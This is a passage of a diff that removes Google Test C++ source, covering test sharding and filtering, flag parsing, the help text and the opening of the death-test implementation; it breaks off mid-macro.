-
-// Given the total number of shards, the shard index, and the test id,
-// returns true iff the test should be run on this shard. The test id is
-// some arbitrary but unique non-negative integer assigned to each test
-// method. Assumes that 0 <= shard_index < total_shards.
-bool ShouldRunTestOnShard(int total_shards, int shard_index, int test_id) {
-  return (test_id % total_shards) == shard_index;
-}
-
-// Compares the name of each test with the user-specified filter to
-// decide whether the test should be run, then records the result in
-// each TestCase and TestInfo object.
-// If shard_tests == true, further filters tests based on sharding
-// variables in the environment - see
-// http://code.google.com/p/googletest/wiki/GoogleTestAdvancedGuide.
-// Returns the number of tests that should run.
-int UnitTestImpl::FilterTests(ReactionToSharding shard_tests) {
-  const Int32 total_shards = shard_tests == HONOR_SHARDING_PROTOCOL ?
-      Int32FromEnvOrDie(kTestTotalShards, -1) : -1;
-  const Int32 shard_index = shard_tests == HONOR_SHARDING_PROTOCOL ?
-      Int32FromEnvOrDie(kTestShardIndex, -1) : -1;
-
-  // num_runnable_tests are the number of tests that will
-  // run across all shards (i.e., match filter and are not disabled).
-  // num_selected_tests are the number of tests to be run on
-  // this shard.
-  int num_runnable_tests = 0;
-  int num_selected_tests = 0;
-  for (size_t i = 0; i < test_cases_.size(); i++) {
-    TestCase* const test_case = test_cases_[i];
-    const std::string &test_case_name = test_case->name();
-    test_case->set_should_run(false);
-
-    for (size_t j = 0; j < test_case->test_info_list().size(); j++) {
-      TestInfo* const test_info = test_case->test_info_list()[j];
-      const std::string test_name(test_info->name());
-      // A test is disabled if test case name or test name matches
-      // kDisableTestFilter.
-      const bool is_disabled =
-          internal::UnitTestOptions::MatchesFilter(test_case_name,
-                                                   kDisableTestFilter) ||
-          internal::UnitTestOptions::MatchesFilter(test_name,
-                                                   kDisableTestFilter);
-      test_info->is_disabled_ = is_disabled;
-
-      const bool matches_filter =
-          internal::UnitTestOptions::FilterMatchesTest(test_case_name,
-                                                       test_name);
-      test_info->matches_filter_ = matches_filter;
-
-      const bool is_runnable =
-          (GTEST_FLAG(also_run_disabled_tests) || !is_disabled) &&
-          matches_filter;
-
-      const bool is_selected = is_runnable &&
-          (shard_tests == IGNORE_SHARDING_PROTOCOL ||
-           ShouldRunTestOnShard(total_shards, shard_index,
-                                num_runnable_tests));
-
-      num_runnable_tests += is_runnable;
-      num_selected_tests += is_selected;
-
-      test_info->should_run_ = is_selected;
-      test_case->set_should_run(test_case->should_run() || is_selected);
-    }
-  }
-  return num_selected_tests;
-}
-
-// Prints the given C-string on a single line by replacing all '\n'
-// characters with string "\\n".  If the output takes more than
-// max_length characters, only prints the first max_length characters
-// and "...".
-static void PrintOnOneLine(const char* str, int max_length) {
-  if (str != NULL) {
-    for (int i = 0; *str != '\0'; ++str) {
-      if (i >= max_length) {
-        printf("...");
-        break;
-      }
-      if (*str == '\n') {
-        printf("\\n");
-        i += 2;
-      } else {
-        printf("%c", *str);
-        ++i;
-      }
-    }
-  }
-}
-
-// Prints the names of the tests matching the user-specified filter flag.
-void UnitTestImpl::ListTestsMatchingFilter() {
-  // Print at most this many characters for each type/value parameter.
-  const int kMaxParamLength = 250;
-
-  for (size_t i = 0; i < test_cases_.size(); i++) {
-    const TestCase* const test_case = test_cases_[i];
-    bool printed_test_case_name = false;
-
-    for (size_t j = 0; j < test_case->test_info_list().size(); j++) {
-      const TestInfo* const test_info =
-          test_case->test_info_list()[j];
-      if (test_info->matches_filter_) {
-        if (!printed_test_case_name) {
-          printed_test_case_name = true;
-          printf("%s.", test_case->name());
-          if (test_case->type_param() != NULL) {
-            printf("  # %s = ", kTypeParamLabel);
-            // We print the type parameter on a single line to make
-            // the output easy to parse by a program.
-            PrintOnOneLine(test_case->type_param(), kMaxParamLength);
-          }
-          printf("\n");
-        }
-        printf("  %s", test_info->name());
-        if (test_info->value_param() != NULL) {
-          printf("  # %s = ", kValueParamLabel);
-          // We print the value parameter on a single line to make the
-          // output easy to parse by a program.
-          PrintOnOneLine(test_info->value_param(), kMaxParamLength);
-        }
-        printf("\n");
-      }
-    }
-  }
-  fflush(stdout);
-}
-
-// Sets the OS stack trace getter.
-//
-// Does nothing if the input and the current OS stack trace getter are
-// the same; otherwise, deletes the old getter and makes the input the
-// current getter.
-void UnitTestImpl::set_os_stack_trace_getter(
-    OsStackTraceGetterInterface* getter) {
-  if (os_stack_trace_getter_ != getter) {
-    delete os_stack_trace_getter_;
-    os_stack_trace_getter_ = getter;
-  }
-}
-
-// Returns the current OS stack trace getter if it is not NULL;
-// otherwise, creates an OsStackTraceGetter, makes it the current
-// getter, and returns it.
-OsStackTraceGetterInterface* UnitTestImpl::os_stack_trace_getter() {
-  if (os_stack_trace_getter_ == NULL) {
-    os_stack_trace_getter_ = new OsStackTraceGetter;
-  }
-
-  return os_stack_trace_getter_;
-}
-
-// Returns the TestResult for the test that's currently running, or
-// the TestResult for the ad hoc test if no test is running.
-TestResult* UnitTestImpl::current_test_result() {
-  return current_test_info_ ?
-      &(current_test_info_->result_) : &ad_hoc_test_result_;
-}
-
-// Shuffles all test cases, and the tests within each test case,
-// making sure that death tests are still run first.
-void UnitTestImpl::ShuffleTests() {
-  // Shuffles the death test cases.
-  ShuffleRange(random(), 0, last_death_test_case_ + 1, &test_case_indices_);
-
-  // Shuffles the non-death test cases.
-  ShuffleRange(random(), last_death_test_case_ + 1,
-               static_cast<int>(test_cases_.size()), &test_case_indices_);
-
-  // Shuffles the tests inside each test case.
-  for (size_t i = 0; i < test_cases_.size(); i++) {
-    test_cases_[i]->ShuffleTests(random());
-  }
-}
-
-// Restores the test cases and tests to their order before the first shuffle.
-void UnitTestImpl::UnshuffleTests() {
-  for (size_t i = 0; i < test_cases_.size(); i++) {
-    // Unshuffles the tests in each test case.
-    test_cases_[i]->UnshuffleTests();
-    // Resets the index of each test case.
-    test_case_indices_[i] = static_cast<int>(i);
-  }
-}
-
-// Returns the current OS stack trace as an std::string.
-//
-// The maximum number of stack frames to be included is specified by
-// the gtest_stack_trace_depth flag.  The skip_count parameter
-// specifies the number of top frames to be skipped, which doesn't
-// count against the number of frames to be included.
-//
-// For example, if Foo() calls Bar(), which in turn calls
-// GetCurrentOsStackTraceExceptTop(..., 1), Foo() will be included in
-// the trace but Bar() and GetCurrentOsStackTraceExceptTop() won't.
-std::string GetCurrentOsStackTraceExceptTop(UnitTest* /*unit_test*/,
-                                            int skip_count) {
-  // We pass skip_count + 1 to skip this wrapper function in addition
-  // to what the user really wants to skip.
-  return GetUnitTestImpl()->CurrentOsStackTraceExceptTop(skip_count + 1);
-}
-
-// Used by the GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_ macro to
-// suppress unreachable code warnings.
-namespace {
-class ClassUniqueToAlwaysTrue {};
-}
-
-bool IsTrue(bool condition) { return condition; }
-
-bool AlwaysTrue() {
-#if GTEST_HAS_EXCEPTIONS
-  // This condition is always false so AlwaysTrue() never actually throws,
-  // but it makes the compiler think that it may throw.
-  if (IsTrue(false))
-    throw ClassUniqueToAlwaysTrue();
-#endif  // GTEST_HAS_EXCEPTIONS
-  return true;
-}
-
-// If *pstr starts with the given prefix, modifies *pstr to be right
-// past the prefix and returns true; otherwise leaves *pstr unchanged
-// and returns false.  None of pstr, *pstr, and prefix can be NULL.
-bool SkipPrefix(const char* prefix, const char** pstr) {
-  const size_t prefix_len = strlen(prefix);
-  if (strncmp(*pstr, prefix, prefix_len) == 0) {
-    *pstr += prefix_len;
-    return true;
-  }
-  return false;
-}
-
-// Parses a string as a command line flag.  The string should have
-// the format "--flag=value".  When def_optional is true, the "=value"
-// part can be omitted.
-//
-// Returns the value of the flag, or NULL if the parsing failed.
-const char* ParseFlagValue(const char* str,
-                           const char* flag,
-                           bool def_optional) {
-  // str and flag must not be NULL.
-  if (str == NULL || flag == NULL) return NULL;
-
-  // The flag must start with "--" followed by GTEST_FLAG_PREFIX_.
-  const std::string flag_str = std::string("--") + GTEST_FLAG_PREFIX_ + flag;
-  const size_t flag_len = flag_str.length();
-  if (strncmp(str, flag_str.c_str(), flag_len) != 0) return NULL;
-
-  // Skips the flag name.
-  const char* flag_end = str + flag_len;
-
-  // When def_optional is true, it's OK to not have a "=value" part.
-  if (def_optional && (flag_end[0] == '\0')) {
-    return flag_end;
-  }
-
-  // If def_optional is true and there are more characters after the
-  // flag name, or if def_optional is false, there must be a '=' after
-  // the flag name.
-  if (flag_end[0] != '=') return NULL;
-
-  // Returns the string after "=".
-  return flag_end + 1;
-}
-
-// Parses a string for a bool flag, in the form of either
-// "--flag=value" or "--flag".
-//
-// In the former case, the value is taken as true as long as it does
-// not start with '0', 'f', or 'F'.
-//
-// In the latter case, the value is taken as true.
-//
-// On success, stores the value of the flag in *value, and returns
-// true.  On failure, returns false without changing *value.
-bool ParseBoolFlag(const char* str, const char* flag, bool* value) {
-  // Gets the value of the flag as a string.
-  const char* const value_str = ParseFlagValue(str, flag, true);
-
-  // Aborts if the parsing failed.
-  if (value_str == NULL) return false;
-
-  // Converts the string value to a bool.
-  *value = !(*value_str == '0' || *value_str == 'f' || *value_str == 'F');
-  return true;
-}
-
-// Parses a string for an Int32 flag, in the form of
-// "--flag=value".
-//
-// On success, stores the value of the flag in *value, and returns
-// true.  On failure, returns false without changing *value.
-bool ParseInt32Flag(const char* str, const char* flag, Int32* value) {
-  // Gets the value of the flag as a string.
-  const char* const value_str = ParseFlagValue(str, flag, false);
-
-  // Aborts if the parsing failed.
-  if (value_str == NULL) return false;
-
-  // Sets *value to the value of the flag.
-  return ParseInt32(Message() << "The value of flag --" << flag,
-                    value_str, value);
-}
-
-// Parses a string for a string flag, in the form of
-// "--flag=value".
-//
-// On success, stores the value of the flag in *value, and returns
-// true.  On failure, returns false without changing *value.
-bool ParseStringFlag(const char* str, const char* flag, std::string* value) {
-  // Gets the value of the flag as a string.
-  const char* const value_str = ParseFlagValue(str, flag, false);
-
-  // Aborts if the parsing failed.
-  if (value_str == NULL) return false;
-
-  // Sets *value to the value of the flag.
-  *value = value_str;
-  return true;
-}
-
-// Determines whether a string has a prefix that Google Test uses for its
-// flags, i.e., starts with GTEST_FLAG_PREFIX_ or GTEST_FLAG_PREFIX_DASH_.
-// If Google Test detects that a command line flag has its prefix but is not
-// recognized, it will print its help message. Flags starting with
-// GTEST_INTERNAL_PREFIX_ followed by "internal_" are considered Google Test
-// internal flags and do not trigger the help message.
-static bool HasGoogleTestFlagPrefix(const char* str) {
-  return (SkipPrefix("--", &str) ||
-          SkipPrefix("-", &str) ||
-          SkipPrefix("/", &str)) &&
-         !SkipPrefix(GTEST_FLAG_PREFIX_ "internal_", &str) &&
-         (SkipPrefix(GTEST_FLAG_PREFIX_, &str) ||
-          SkipPrefix(GTEST_FLAG_PREFIX_DASH_, &str));
-}
-
-// Prints a string containing code-encoded text.  The following escape
-// sequences can be used in the string to control the text color:
-//
-//   @@    prints a single '@' character.
-//   @R    changes the color to red.
-//   @G    changes the color to green.
-//   @Y    changes the color to yellow.
-//   @D    changes to the default terminal text color.
-//
-// TODO(wan@google.com): Write tests for this once we add stdout
-// capturing to Google Test.
-static void PrintColorEncoded(const char* str) {
-  GTestColor color = COLOR_DEFAULT;  // The current color.
-
-  // Conceptually, we split the string into segments divided by escape
-  // sequences.  Then we print one segment at a time.  At the end of
-  // each iteration, the str pointer advances to the beginning of the
-  // next segment.
-  for (;;) {
-    const char* p = strchr(str, '@');
-    if (p == NULL) {
-      ColoredPrintf(color, "%s", str);
-      return;
-    }
-
-    ColoredPrintf(color, "%s", std::string(str, p).c_str());
-
-    const char ch = p[1];
-    str = p + 2;
-    if (ch == '@') {
-      ColoredPrintf(color, "@");
-    } else if (ch == 'D') {
-      color = COLOR_DEFAULT;
-    } else if (ch == 'R') {
-      color = COLOR_RED;
-    } else if (ch == 'G') {
-      color = COLOR_GREEN;
-    } else if (ch == 'Y') {
-      color = COLOR_YELLOW;
-    } else {
-      --str;
-    }
-  }
-}
-
-static const char kColorEncodedHelpMessage[] =
-"This program contains tests written using " GTEST_NAME_ ". You can use the\n"
-"following command line flags to control its behavior:\n"
-"\n"
-"Test Selection:\n"
-"  @G--" GTEST_FLAG_PREFIX_ "list_tests@D\n"
-"      List the names of all tests instead of running them. The name of\n"
-"      TEST(Foo, Bar) is \"Foo.Bar\".\n"
-"  @G--" GTEST_FLAG_PREFIX_ "filter=@YPOSTIVE_PATTERNS"
-    "[@G-@YNEGATIVE_PATTERNS]@D\n"
-"      Run only the tests whose name matches one of the positive patterns but\n"
-"      none of the negative patterns. '?' matches any single character; '*'\n"
-"      matches any substring; ':' separates two patterns.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "also_run_disabled_tests@D\n"
-"      Run all disabled tests too.\n"
-"\n"
-"Test Execution:\n"
-"  @G--" GTEST_FLAG_PREFIX_ "repeat=@Y[COUNT]@D\n"
-"      Run the tests repeatedly; use a negative count to repeat forever.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "shuffle@D\n"
-"      Randomize tests' orders on every iteration.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "random_seed=@Y[NUMBER]@D\n"
-"      Random number seed to use for shuffling test orders (between 1 and\n"
-"      99999, or 0 to use a seed based on the current time).\n"
-"\n"
-"Test Output:\n"
-"  @G--" GTEST_FLAG_PREFIX_ "color=@Y(@Gyes@Y|@Gno@Y|@Gauto@Y)@D\n"
-"      Enable/disable colored output. The default is @Gauto@D.\n"
-"  -@G-" GTEST_FLAG_PREFIX_ "print_time=0@D\n"
-"      Don't print the elapsed time of each test.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "output=xml@Y[@G:@YDIRECTORY_PATH@G"
-    GTEST_PATH_SEP_ "@Y|@G:@YFILE_PATH]@D\n"
-"      Generate an XML report in the given directory or with the given file\n"
-"      name. @YFILE_PATH@D defaults to @Gtest_details.xml@D.\n"
-#if GTEST_CAN_STREAM_RESULTS_
-"  @G--" GTEST_FLAG_PREFIX_ "stream_result_to=@YHOST@G:@YPORT@D\n"
-"      Stream test results to the given server.\n"
-#endif  // GTEST_CAN_STREAM_RESULTS_
-"\n"
-"Assertion Behavior:\n"
-#if GTEST_HAS_DEATH_TEST && !GTEST_OS_WINDOWS
-"  @G--" GTEST_FLAG_PREFIX_ "death_test_style=@Y(@Gfast@Y|@Gthreadsafe@Y)@D\n"
-"      Set the default death test style.\n"
-#endif  // GTEST_HAS_DEATH_TEST && !GTEST_OS_WINDOWS
-"  @G--" GTEST_FLAG_PREFIX_ "break_on_failure@D\n"
-"      Turn assertion failures into debugger break-points.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "throw_on_failure@D\n"
-"      Turn assertion failures into C++ exceptions.\n"
-"  @G--" GTEST_FLAG_PREFIX_ "catch_exceptions=0@D\n"
-"      Do not report exceptions as test failures. Instead, allow them\n"
-"      to crash the program or throw a pop-up (on Windows).\n"
-"\n"
-"Except for @G--" GTEST_FLAG_PREFIX_ "list_tests@D, you can alternatively set "
-    "the corresponding\n"
-"environment variable of a flag (all letters in upper-case). For example, to\n"
-"disable colored text output, you can either specify @G--" GTEST_FLAG_PREFIX_
-    "color=no@D or set\n"
-"the @G" GTEST_FLAG_PREFIX_UPPER_ "COLOR@D environment variable to @Gno@D.\n"
-"\n"
-"For more information, please read the " GTEST_NAME_ " documentation at\n"
-"@G" GTEST_PROJECT_URL_ "@D. If you find a bug in " GTEST_NAME_ "\n"
-"(not one in your own code or tests), please report it to\n"
-"@G<" GTEST_DEV_EMAIL_ ">@D.\n";
-
-// Parses the command line for Google Test flags, without initializing
-// other parts of Google Test.  The type parameter CharType can be
-// instantiated to either char or wchar_t.
-template <typename CharType>
-void ParseGoogleTestFlagsOnlyImpl(int* argc, CharType** argv) {
-  for (int i = 1; i < *argc; i++) {
-    const std::string arg_string = StreamableToString(argv[i]);
-    const char* const arg = arg_string.c_str();
-
-    using internal::ParseBoolFlag;
-    using internal::ParseInt32Flag;
-    using internal::ParseStringFlag;
-
-    // Do we see a Google Test flag?
-    if (ParseBoolFlag(arg, kAlsoRunDisabledTestsFlag,
-                      &GTEST_FLAG(also_run_disabled_tests)) ||
-        ParseBoolFlag(arg, kBreakOnFailureFlag,
-                      &GTEST_FLAG(break_on_failure)) ||
-        ParseBoolFlag(arg, kCatchExceptionsFlag,
-                      &GTEST_FLAG(catch_exceptions)) ||
-        ParseStringFlag(arg, kColorFlag, &GTEST_FLAG(color)) ||
-        ParseStringFlag(arg, kDeathTestStyleFlag,
-                        &GTEST_FLAG(death_test_style)) ||
-        ParseBoolFlag(arg, kDeathTestUseFork,
-                      &GTEST_FLAG(death_test_use_fork)) ||
-        ParseStringFlag(arg, kFilterFlag, &GTEST_FLAG(filter)) ||
-        ParseStringFlag(arg, kInternalRunDeathTestFlag,
-                        &GTEST_FLAG(internal_run_death_test)) ||
-        ParseBoolFlag(arg, kListTestsFlag, &GTEST_FLAG(list_tests)) ||
-        ParseStringFlag(arg, kOutputFlag, &GTEST_FLAG(output)) ||
-        ParseBoolFlag(arg, kPrintTimeFlag, &GTEST_FLAG(print_time)) ||
-        ParseInt32Flag(arg, kRandomSeedFlag, &GTEST_FLAG(random_seed)) ||
-        ParseInt32Flag(arg, kRepeatFlag, &GTEST_FLAG(repeat)) ||
-        ParseBoolFlag(arg, kShuffleFlag, &GTEST_FLAG(shuffle)) ||
-        ParseInt32Flag(arg, kStackTraceDepthFlag,
-                       &GTEST_FLAG(stack_trace_depth)) ||
-        ParseStringFlag(arg, kStreamResultToFlag,
-                        &GTEST_FLAG(stream_result_to)) ||
-        ParseBoolFlag(arg, kThrowOnFailureFlag,
-                      &GTEST_FLAG(throw_on_failure))
-        ) {
-      // Yes.  Shift the remainder of the argv list left by one.  Note
-      // that argv has (*argc + 1) elements, the last one always being
-      // NULL.  The following loop moves the trailing NULL element as
-      // well.
-      for (int j = i; j != *argc; j++) {
-        argv[j] = argv[j + 1];
-      }
-
-      // Decrements the argument count.
-      (*argc)--;
-
-      // We also need to decrement the iterator as we just removed
-      // an element.
-      i--;
-    } else if (arg_string == "--help" || arg_string == "-h" ||
-               arg_string == "-?" || arg_string == "/?" ||
-               HasGoogleTestFlagPrefix(arg)) {
-      // Both help flag and unrecognized Google Test flags (excluding
-      // internal ones) trigger help display.
-      g_help_flag = true;
-    }
-  }
-
-  if (g_help_flag) {
-    // We print the help here instead of in RUN_ALL_TESTS(), as the
-    // latter may not be called at all if the user is using Google
-    // Test with another testing framework.
-    PrintColorEncoded(kColorEncodedHelpMessage);
-  }
-}
-
-// Parses the command line for Google Test flags, without initializing
-// other parts of Google Test.
-void ParseGoogleTestFlagsOnly(int* argc, char** argv) {
-  ParseGoogleTestFlagsOnlyImpl(argc, argv);
-}
-void ParseGoogleTestFlagsOnly(int* argc, wchar_t** argv) {
-  ParseGoogleTestFlagsOnlyImpl(argc, argv);
-}
-
-// The internal implementation of InitGoogleTest().
-//
-// The type parameter CharType can be instantiated to either char or
-// wchar_t.
-template <typename CharType>
-void InitGoogleTestImpl(int* argc, CharType** argv) {
-  g_init_gtest_count++;
-
-  // We don't want to run the initialization code twice.
-  if (g_init_gtest_count != 1) return;
-
-  if (*argc <= 0) return;
-
-  internal::g_executable_path = internal::StreamableToString(argv[0]);
-
-#if GTEST_HAS_DEATH_TEST
-
-  g_argvs.clear();
-  for (int i = 0; i != *argc; i++) {
-    g_argvs.push_back(StreamableToString(argv[i]));
-  }
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-  ParseGoogleTestFlagsOnly(argc, argv);
-  GetUnitTestImpl()->PostFlagParsingInit();
-}
-
-}  // namespace internal
-
-// Initializes Google Test.  This must be called before calling
-// RUN_ALL_TESTS().  In particular, it parses a command line for the
-// flags that Google Test recognizes.  Whenever a Google Test flag is
-// seen, it is removed from argv, and *argc is decremented.
-//
-// No value is returned.  Instead, the Google Test flag variables are
-// updated.
-//
-// Calling the function for the second time has no user-visible effect.
-void InitGoogleTest(int* argc, char** argv) {
-  internal::InitGoogleTestImpl(argc, argv);
-}
-
-// This overloaded version can be used in Windows programs compiled in
-// UNICODE mode.
-void InitGoogleTest(int* argc, wchar_t** argv) {
-  internal::InitGoogleTestImpl(argc, argv);
-}
-
-}  // namespace testing
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan), vladl@google.com (Vlad Losev)
-//
-// This file implements death tests.
-
-
-#if GTEST_HAS_DEATH_TEST
-
-# if GTEST_OS_MAC
-#  include <crt_externs.h>
-# endif  // GTEST_OS_MAC
-
-# include <errno.h>
-# include <fcntl.h>
-# include <limits.h>
-
-# if GTEST_OS_LINUX
-#  include <signal.h>
-# endif  // GTEST_OS_LINUX
-
-# include <stdarg.h>
-
-# if GTEST_OS_WINDOWS
-#  include <windows.h>
-# else
-#  include <sys/mman.h>
-#  include <sys/wait.h>
-# endif  // GTEST_OS_WINDOWS
-
-# if GTEST_OS_QNX
-#  include <spawn.h>
-# endif  // GTEST_OS_QNX
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-
-// Indicates that this translation unit is part of Google Test's
-// implementation.  It must come before gtest-internal-inl.h is
-// included, or there will be a compiler error.  This trick exists to
-// prevent the accidental inclusion of gtest-internal-inl.h in the
-// user's code.
-#define GTEST_IMPLEMENTATION_ 1
-#undef GTEST_IMPLEMENTATION_
-
-namespace testing {
-
-// Constants.
-
-// The default death test style.
-static const char kDefaultDeathTestStyle[] = "fast";
-
-GTEST_DEFINE_string_(
-    death_test_style,
-    internal::StringFromGTestEnv("death_test_style", kDefaultDeathTestStyle),
-    "Indicates how to run a death test in a forked child process: "
-    "\"threadsafe\" (child process re-executes the test binary "
-    "from the beginning, running only the specific death test) or "
-    "\"fast\" (child process runs the death test immediately "
-    "after forking).");
-
-GTEST_DEFINE_bool_(
-    death_test_use_fork,
-    internal::BoolFromGTestEnv("death_test_use_fork", false),
-    "Instructs to use fork()/_exit() instead of clone() in death tests. "
-    "Ignored and always uses fork() on POSIX systems where clone() is not "
-    "implemented. Useful when running under valgrind or similar tools if "
-    "those do not support clone(). Valgrind 3.3.1 will just fail if "
-    "it sees an unsupported combination of clone() flags. "
-    "It is not recommended to use this flag w/o valgrind though it will "
-    "work in 99% of the cases. Once valgrind is fixed, this flag will "
-    "most likely be removed.");
-
-namespace internal {
-GTEST_DEFINE_string_(
-    internal_run_death_test, "",
-    "Indicates the file, line number, temporal index of "
-    "the single death test to run, and a file descriptor to "
-    "which a success code may be sent, all separated by "
-    "the '|' characters.  This flag is specified if and only if the current "
-    "process is a sub-process launched for running a thread-safe "
-    "death test.  FOR INTERNAL USE ONLY.");
-}  // namespace internal
-
-#if GTEST_HAS_DEATH_TEST
-
-namespace internal {
-
-// Valid only for fast death tests. Indicates the code is running in the
-// child process of a fast style death test.
-static bool g_in_fast_death_test_child = false;
-
-// Returns a Boolean value indicating whether the caller is currently
-// executing in the context of the death test child process.  Tools such as
-// Valgrind heap checkers may need this to modify their behavior in death
-// tests.  IMPORTANT: This is an internal utility.  Using it may break the
-// implementation of death tests.  User code MUST NOT use it.
-bool InDeathTestChild() {
-# if GTEST_OS_WINDOWS
-
-  // On Windows, death tests are thread-safe regardless of the value of the
-  // death_test_style flag.
-  return !GTEST_FLAG(internal_run_death_test).empty();
-
-# else
-
-  if (GTEST_FLAG(death_test_style) == "threadsafe")
-    return !GTEST_FLAG(internal_run_death_test).empty();
-  else
-    return g_in_fast_death_test_child;
-#endif
-}
-
-}  // namespace internal
-
-// ExitedWithCode constructor.
-ExitedWithCode::ExitedWithCode(int exit_code) : exit_code_(exit_code) {
-}
-
-// ExitedWithCode function-call operator.
-bool ExitedWithCode::operator()(int exit_status) const {
-# if GTEST_OS_WINDOWS
-
-  return exit_status == exit_code_;
-
-# else
-
-  return WIFEXITED(exit_status) && WEXITSTATUS(exit_status) == exit_code_;
-
-# endif  // GTEST_OS_WINDOWS
-}
-
-# if !GTEST_OS_WINDOWS
-// KilledBySignal constructor.
-KilledBySignal::KilledBySignal(int signum) : signum_(signum) {
-}
-
-// KilledBySignal function-call operator.
-bool KilledBySignal::operator()(int exit_status) const {
-  return WIFSIGNALED(exit_status) && WTERMSIG(exit_status) == signum_;
-}
-# endif  // !GTEST_OS_WINDOWS
-
-namespace internal {
-
-// Utilities needed for death tests.
-
-// Generates a textual description of a given exit code, in the format
-// specified by wait(2).
-static std::string ExitSummary(int exit_code) {
-  Message m;
-
-# if GTEST_OS_WINDOWS
-
-  m << "Exited with exit status " << exit_code;
-
-# else
-
-  if (WIFEXITED(exit_code)) {
-    m << "Exited with exit status " << WEXITSTATUS(exit_code);
-  } else if (WIFSIGNALED(exit_code)) {
-    m << "Terminated by signal " << WTERMSIG(exit_code);
-  }
-#  ifdef WCOREDUMP
-  if (WCOREDUMP(exit_code)) {
-    m << " (core dumped)";
-  }
-#  endif
-# endif  // GTEST_OS_WINDOWS
-
-  return m.GetString();
-}
-
-// Returns true if exit_status describes a process that was terminated
-// by a signal, or exited normally with a nonzero exit code.
-bool ExitedUnsuccessfully(int exit_status) {
-  return !ExitedWithCode(0)(exit_status);
-}
-
-# if !GTEST_OS_WINDOWS
-// Generates a textual failure message when a death test finds more than
-// one thread running, or cannot determine the number of threads, prior
-// to executing the given statement.  It is the responsibility of the
-// caller not to pass a thread_count of 1.
-static std::string DeathTestThreadWarning(size_t thread_count) {
-  Message msg;
-  msg << "Death tests use fork(), which is unsafe particularly"
-      << " in a threaded context. For this test, " << GTEST_NAME_ << " ";
-  if (thread_count == 0)
-    msg << "couldn't detect the number of threads.";
-  else
-    msg << "detected " << thread_count << " threads.";
-  return msg.GetString();
-}
-# endif  // !GTEST_OS_WINDOWS
-
-// Flag characters for reporting a death test that did not die.
-static const char kDeathTestLived = 'L';
-static const char kDeathTestReturned = 'R';
-static const char kDeathTestThrew = 'T';
-static const char kDeathTestInternalError = 'I';
-
-// An enumeration describing all of the possible ways that a death test can
-// conclude.  DIED means that the process died while executing the test
-// code; LIVED means that process lived beyond the end of the test code;
-// RETURNED means that the test statement attempted to execute a return
-// statement, which is not allowed; THREW means that the test statement
-// returned control by throwing an exception.  IN_PROGRESS means the test
-// has not yet concluded.
-// TODO(vladl@google.com): Unify names and possibly values for
-// AbortReason, DeathTestOutcome, and flag characters above.
-enum DeathTestOutcome { IN_PROGRESS, DIED, LIVED, RETURNED, THREW };
-
-// Routine for aborting the program which is safe to call from an
-// exec-style death test child process, in which case the error
-// message is propagated back to the parent process.  Otherwise, the
-// message is simply printed to stderr.  In either case, the program
-// then exits with status 1.
-void DeathTestAbort(const std::string& message) {
-  // On a POSIX system, this function may be called from a threadsafe-style
-  // death test child process, which operates on a very small stack.  Use
-  // the heap for any additional non-minuscule memory requirements.
-  const InternalRunDeathTestFlag* const flag =
-      GetUnitTestImpl()->internal_run_death_test_flag();
-  if (flag != NULL) {
-    FILE* parent = posix::FDOpen(flag->write_fd(), "w");
-    fputc(kDeathTestInternalError, parent);
-    fprintf(parent, "%s", message.c_str());
-    fflush(parent);
-    _exit(1);
-  } else {
-    fprintf(stderr, "%s", message.c_str());
-    fflush(stderr);
-    posix::Abort();
-  }
-}
-
-// A replacement for CHECK that calls DeathTestAbort if the assertion
-// fails.
-# define GTEST_DEATH_TEST_CHECK_(expression) \
-  do { \
-    if (!::testing::internal::IsTrue(expression)) { \
-      DeathTestAbort( \
-          ::std::string("CHECK failed: File ") + __FILE__ +  ", line " \
-          + ::testing::internal::StreamableToString(__LINE__) + ": " \
-          + #expression); \
-    } \
-  } while (::testing::internal::AlwaysFalse())
-
-// This macro is similar to GTEST_DEATH_TEST_CHECK_, but it is meant for
-// evaluating any system call that fulfills two conditions: it must return
-// -1 on failure, and set errno to EINTR when it is interrupted and
-// should be tried again.  The macro expands to a loop that repeatedly
-// evaluates the expression as long as it evaluates to -1 and sets
-// errno to EINTR.  If the expression evaluates to -1 but errno is
-// something other than EINTR, DeathTestAbort is called.
-# define GTEST_DEATH_TEST_CHECK_SYSCALL_(expression) \
-  do { \
-    int gtest_retval; \
-    do { \
-      gtest_retval = (expression); \
-    } while (gtest_retval == -1 && errno == EINTR); \
-    if (gtest_retval == -1) { \
-      DeathTestAbort( \
-          ::std::string("CHECK failed: File ") + __FILE__ + ", line " \
-          + ::testing::internal::StreamableToString(__LINE__) + ": " \
-          + #expression + " != -1"); \
